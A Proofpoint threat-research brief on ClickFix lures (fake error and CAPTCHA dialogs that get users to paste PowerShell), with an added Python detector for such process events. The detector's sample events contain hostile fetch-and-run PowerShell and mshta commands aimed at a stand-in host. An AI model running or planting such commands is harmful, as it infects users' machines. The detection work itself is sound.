URL: https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape

SECURITY BRIEF: CLICKFIX SOCIAL ENGINEERING TECHNIQUE FLOODS THREAT LANDSCAPE


November 18, 2024 Tommy Madjar, Selena Larson and The Proofpoint Threat Research Team


WHAT HAPPENED 

Proofpoint researchers have identified an increase in a unique social
engineering technique called ClickFix. And the lures are getting even more
clever. 

Initially observed earlier this year in campaigns from initial access broker
TA571 and a fake update website compromise threat cluster known as ClearFake,
the ClickFix technique that attempts to lure unsuspecting users to copy and run
PowerShell to download malware is now much more popular across the threat
landscape.  

The ClickFix social engineering technique uses dialogue boxes containing fake
error messages to trick people into copying, pasting, and running malicious
content on their own computer. 



Example of early ClickFix technique used by ClearFake.  

Proofpoint has observed threat actors impersonating various software and
services using the ClickFix technique as part of their social engineering,
including common enterprise software such as Microsoft Word and Google Chrome,
as well as software specifically observed in target environments such as
transportation and logistics. 

The ClickFix technique is used by many different threat actors and can
originate from compromised websites, documents, HTML attachments, malicious
URLs and other delivery vectors. In most cases, when directed to the malicious
URL or file, users are shown a dialog box that suggests an error occurred while
opening a document or webpage. This dialog box includes instructions that
appear to describe how to “fix” the problem but that actually do one of two
things: automatically copy a malicious script to the clipboard so that it is
pasted into the PowerShell terminal or the Windows Run dialog box, where it
eventually runs a malicious script via PowerShell; or instruct the user to open
PowerShell manually and paste in the provided command.

Proofpoint has observed ClickFix campaigns leading to malware including
AsyncRAT, Danabot, DarkGate, Lumma Stealer, NetSupport, and more.  



ClickFix campaigns observed March through October 2024.  

Notably, threat actors have recently been observed using a fake-CAPTCHA-themed
ClickFix technique that pretends to validate the user with a "Verify You Are
Human" (CAPTCHA) check. Much of the activity is based on an open source toolkit
named reCAPTCHA Phish, available on GitHub for “educational purposes.” The tool
was released in mid-September by a security researcher, and Proofpoint began
observing it in email threat data just days later. The purpose of the repository
was to demonstrate a similar technique used by threat actors since August 2024
on websites related to video streaming. Ukraine CERT recently published details
on a suspected Russian espionage actor using the fake CAPTCHA ClickFix technique
in campaigns targeting government entities in Ukraine.


RECENT EXAMPLES 

GITHUB “SECURITY VULNERABILITY” NOTIFICATIONS  

On 18 September 2024, Proofpoint researchers identified a campaign using GitHub
notifications to deliver malware. The messages were notifications for GitHub
activity. The threat actor either commented on or created an issue in a GitHub
repository. If the repository owner, issue owner, or other relevant
collaborators had email notifications enabled, they received an email
notification containing the content of the comment or issue from GitHub. This
campaign was publicly reported by security journalist Brian Krebs.  



Email from GitHub. 

The notification impersonated a security warning from GitHub and included a link
to a fake GitHub website. The fake website used the reCAPTCHA Phish and ClickFix
social engineering technique to trick users into executing a PowerShell command
on their computer.   



ClickFix style “verification steps” to execute PowerShell. 

The landing page contained a fake reCAPTCHA message at the end of the copied
command so the target would not see the actual malicious command in the run-box
when the malicious command was pasted. If the user performed the requested
steps, PowerShell code was executed to download an executable that led to the
installation of Lumma Stealer. The activity impacted at least 300 organizations
globally, according to Proofpoint visibility. 

SWISS TARGETED CLICKFIX DELIVERS MALWARE 

Proofpoint has observed actors using the reCAPTCHA ClickFix technique in
multiple languages targeting organizations globally. In September 2024,
researchers identified a German language campaign targeting Swiss organizations
using ClickFix with the fake CAPTCHA. The messages impersonated the Swiss
e-commerce marketplace Ricardo and contained URLs. When clicked, the users were
directed to a landing page using the reCAPTCHA phish tool. The page instructed
the user to click to copy and paste to resolve an issue. However, this actually
ran JavaScript that downloaded a ZIP file from a Dropbox URL. Then,
copyToClipboard was executed which invoked PowerShell to unzip and launch the
BAT file embedded in the ZIP. At the time of analysis, researchers were unable
to identify the dropped malware, but based on C2 traffic assessed the payload
was likely AsyncRAT or PureLog Stealer.  



Screenshot of fake Ricardo site containing “ClickFix” instructions. 

FAKE SOFTWARE UPDATES DELIVER NETSUPPORT RAT  

On 5 September 2024, researchers identified a NetSupport campaign that used
“benign” email messages to instruct users to copy and paste PowerShell into
their terminal. The emails did not contain any malicious links or attachments,
simply instructions.  

The emails masqueraded as security updates, for example: 

        From: Security Agent <resizenreyl6@web[.]de> 

        Subject: Important Software Update: Action Required. 

These messages contained instructions to manually run an encoded PowerShell
command to update the allegedly insecure software. (The supposedly unsafe
software was never named – just “software”.) 



Copy and paste PowerShell lure.  

If the PowerShell command was executed, it executed a remote PowerShell script.
This second PowerShell script downloaded 7zip and a password-protected 7z file.
It then used 7zip to extract the 7z file with the password
"fJgGDNG_yudnt4YBJtYJfnJ" and ran NetSupport. 

While it’s more common to see the ClickFix technique used with automatic copy
and paste functions, the instructions requiring more manual work on the part of
the user are also common. However, it is likely the variant requiring more
manual work on the part of the user is less effective, as users may be more
hesitant about manually copying and running encoded PowerShell.  

HTML ATTACHMENTS TO BRUTE RATEL C4 AND LATRODECTUS 

On 20 September 2024, Proofpoint researchers identified a campaign delivering
Brute Ratel C4 and Latrodectus. Messages came from various senders and subjects
referencing business themes including budget, finance, invoice, documents,
shipping, etc. and contained HTML attachments. Filenames started with “Report_”
or “scan_doc_” followed by randomized numeric characters. When opened, the HTML
attachment displayed a dialog box with instructions that varied slightly
depending on the filename, but both contained a button for users to click,
labelled either “Solution” or “How to fix”.



HTML files containing ClickFix instructions. Examples for attachments named
“Report_” (on the left) and “scan_doc_” (on the right).  

When clicked, base64 encoded PowerShell was copied, and the user was presented
with another dialogue box that instructed the user to open Run, paste, and
execute the command. The PowerShell command was used to download a DLL which
started Brute Ratel. Brute Ratel was observed leading to Latrodectus.   



Instructions to get a user to paste and run PowerShell.   

The attack chain used in this campaign and the resulting dialog box were notably
different from previously observed variants. The sample observed in this
campaign attempted to evade analysts by reversing strings in the HTML body of
the webpage.

While this attack chain and resulting payload delivery overlapped with
previously observed TA571 and TA578 campaigns, Proofpoint researchers do not
attribute this activity with high confidence to a known threat actor.  

CHATGPT MALVERTISING DELIVERS XWORM 

In mid-October 2024, researchers observed malvertising using ChatGPT themed
lures to deliver XWorm via the ClickFix technique. The malicious website was
observed being distributed via Outbrain chumboxes on a large tech site with the
text “Unlock the Power of ChatGPT”. It contained an attacker-owned domain
“promtcraft[.]online” claiming to be an LLM prompt generator PromtCraft. The
advertisement was likely running on multiple media outlets given Outbrain’s ad
distribution. 

When clicked, the linked domain displayed a customized version of the open
source reCAPTCHA phish tool, which had a lure encouraging visitors to join a
ChatGPT community, with the ClickFix clipboard payload. 



ChatGPT impersonation used in ClickFix payload delivery.  

If the clipboard payload was executed, MSHTA was invoked to run the HTA script
in an HTML file obfuscated with ProtWare HTML Guardian Personal Edition, causing
MSHTA to call two different remote PowerShell scripts. The first script used
RegAsm to run XWorm encoded in a Base64 variable, which ran the HVNC plugin to
allow full access to the computer. The second script used RegAsm to run an
executable encoded in a Base64 variable. This executable was created with
SharpHide and was used to create a hidden registry key that runs the first
XWorm PowerShell script at each boot.

Notably, in addition to a different visual template than the original reCAPTCHA
phish, the JavaScript on the malicious site contained Russian comments, likely
generated by an LLM explaining the code.  



Suspected LLM generated JavaScript to display the reCAPTCHA phish.   

SUSPECTED UAC-0050 TARGETS UKRAINE 

On 31 October 2024, Proofpoint researchers identified a Ukrainian language
campaign purporting to be emails sharing documents or requested information with
the recipient. Emails targeted organizations in Ukraine.  

Messages contained compressed HTML attachments which, if executed, presented a
web page with a lure using the reCAPTCHA phish ClickFix technique. If the user
copied and pasted the PowerShell script as instructed, it executed a second
PowerShell script which used BITS transfer to download and run a malicious
payload, suspected to be Lucky Volunteer. Lucky Volunteer is a rarely observed
information stealing payload previously identified in a March 2023 TA579
campaign in which AresLoader dropped Lucky Volunteer.



Ukrainian language lure purporting to be related to alleged information
requested. 

Notably, this activity used an English-language reCAPTCHA phish ClickFix landing
page, despite the email content and attachment names being written in
Ukrainian. Proofpoint assesses the campaign overlaps with activity attributed to
UAC-0050.
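Every chain in the examples above shares one observable moment, described in the technique overview and again in the fake-update, HTML-attachment and malvertising sections: a person pastes a command into the Run dialog or a console, and explorer.exe (or that console) then spawns PowerShell or mshta.exe with a clipboard-sized command line that fetches a remote script. The following is an added example, not Proofpoint's code, that scores constructed process-creation events for that pattern; the field names, the example.invalid hosts and all sample events are assumptions made for this illustration.

```python
"""Triage of process-creation events for ClickFix-style execution.

Added example, not Proofpoint's code. The telltale tree is explorer.exe (or an
interactive console) spawning powershell.exe or mshta.exe with a command line
that reaches out to a remote script. Field names and all sample events are
constructed; map them onto your EDR or Sysmon Event ID 1 fields as appropriate.
"""
import base64
import re
from typing import Optional

# Parents that mean "a human typed or pasted this" rather than a task or service.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}
# First-stage binaries named across the campaigns in the brief.
CLICKFIX_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# Indicators checked after decoding; the keys become human-readable reasons.
TOKENS = {
    "invoke-expression": r"\biex\b|invoke-expression",
    "remote download": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer",
    "url in command": r"\bhttps?://",
    "mshta/regasm lolbin": r"\bmshta\b|\bregasm\b",
    # The GitHub campaign appended a fake reCAPTCHA note so the Run box showed only that.
    "fake captcha decoy comment": r"#\s*['\"]*.*?(?:not a robot|captcha|verif)",
}
_ENC_RE = re.compile(r"(?:-|/)(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
_HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand argument, or None if absent or malformed.
    PowerShell expects Base64 over UTF-16LE text, so a plain .decode() would fail."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(event: dict) -> tuple[int, list[str]]:
    """Score one process-creation event; higher means more ClickFix-like."""
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    child = event["image"].lower().rsplit("\\", 1)[-1]
    cmdline = event["command_line"]
    reasons: list[str] = []
    if child not in CLICKFIX_CHILDREN:
        return 0, reasons
    score = 0
    if parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append(f"{child} launched from interactive parent {parent}")
    if child == "mshta.exe":
        score += 1
        reasons.append("mshta.exe used as first stage")
    decoded = decode_encoded_command(cmdline)
    text = cmdline
    if decoded is not None:
        score += 2
        reasons.append("Base64/UTF-16LE encoded command decoded")
        text = _ENC_RE.sub(" ", cmdline) + " " + decoded  # scan plaintext, not the blob
    if _HIDDEN_RE.search(text):
        score += 1
        reasons.append("hidden window requested")
    for name, pattern in TOKENS.items():
        if re.search(pattern, text, re.I):
            score += 1
            reasons.append(name)
    return score, reasons

def detect(events: list[dict], threshold: int = 5) -> list[tuple[str, int, list[str]]]:
    """Return (event id, score, reasons) for every event at or above threshold."""
    return [(ev["id"], s, r) for ev in events for s, r in [score_event(ev)] if s >= threshold]

def encode_command(plain: str) -> str:
    """Build a -EncodedCommand blob the way PowerShell expects (for the samples)."""
    return base64.b64encode(plain.encode("utf-16-le")).decode("ascii")

# Constructed sample events; example.invalid stands in for attacker infrastructure.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": "evt-1", "parent_image": r"C:\Windows\System32\svchost.exe", "image": PS,
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    # Run-dialog paste in the style of the GitHub/reCAPTCHA campaign, decoy note at the end.
    {"id": "evt-2", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell.exe -w hidden -c \"iex (iwr 'http://example.invalid/a.txt')\" "
                     "# 'I am not a robot - reCAPTCHA Verification ID: 7624'"},
    # Encoded variant in the style of the fake-update and HTML-attachment campaigns.
    {"id": "evt-3", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell.exe -enc " + encode_command(
         "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')")},
    # mshta first stage in the style of the ChatGPT malvertising chain.
    {"id": "evt-4", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe", "command_line": "mshta.exe http://example.invalid/page.html"},
    # Admin running an encoded but harmless command from a console: stays below threshold.
    {"id": "evt-5", "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "command_line": "powershell.exe -enc " + encode_command("Get-Date")},
]
```

Commands pasted into an already-open PowerShell window do not create a new process, so for that variant the same scoring should be fed from script-block logging rather than process creation.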


ATTRIBUTION  

The ClickFix technique was first prominently observed in Proofpoint data being
used by TA571 and ClearFake; however, it is now used by several unattributed
threat clusters, including a sophisticated cybercrime activity set that
specifically targets transportation and logistics firms with customized
ClickFix lures.

Proofpoint previously referred to a cluster of web inject activity using this
technique as "ClickFix." However, after widespread use of the technique observed
in Proofpoint data and third-party reporting, Proofpoint refers to the technique
as ClickFix, and the activity is not all attributed to the original cluster of
activity. This activity was distinctly separate from the ClearFake threat
cluster, although some activity did overlap. It is possible the activity is all
attributable to ClearFake, which Proofpoint has not observed since August
2024.  

Most observed ClickFix campaigns are not attributed to a known threat actor or
group. The campaigns observed in Proofpoint data mostly appear to have
financially motivated objectives.  


WHY IT MATTERS  

The ClickFix technique is growing in popularity and is being used by many
financially motivated threat actors, as well as reportedly by suspected
espionage-focused groups. Given the widespread adoption, it is likely this
technique is very effective.  

What’s insidious about this technique is the adversaries are preying on people’s
innate desire to be helpful and independent. By providing what appears to be
both a problem and a solution, people feel empowered to “fix” the issue
themselves without needing to alert their IT team or anyone else, and it
bypasses security protections by having the person infect themselves.  

But this innovation in social engineering is a direct result of people getting
better at protecting themselves online. Macros are less likely to work, invoice
lures are suspicious, unsolicited links or attachments with clearly malicious
content will get blocked by security mechanisms. So, hackers have to get
creative, and focus their efforts more on hacking people’s brains, emotions, and
behaviors via crafty social engineering so they can keep installing malware.  

As users get smarter and remain vigilant about the ways adversaries are trying
to gain initial access, hackers respond by trying a lot of different techniques
to see what works best. Organizations should train users on this technique
specifically to prevent exploitation.  


EXAMPLE INDICATORS OF COMPROMISE 

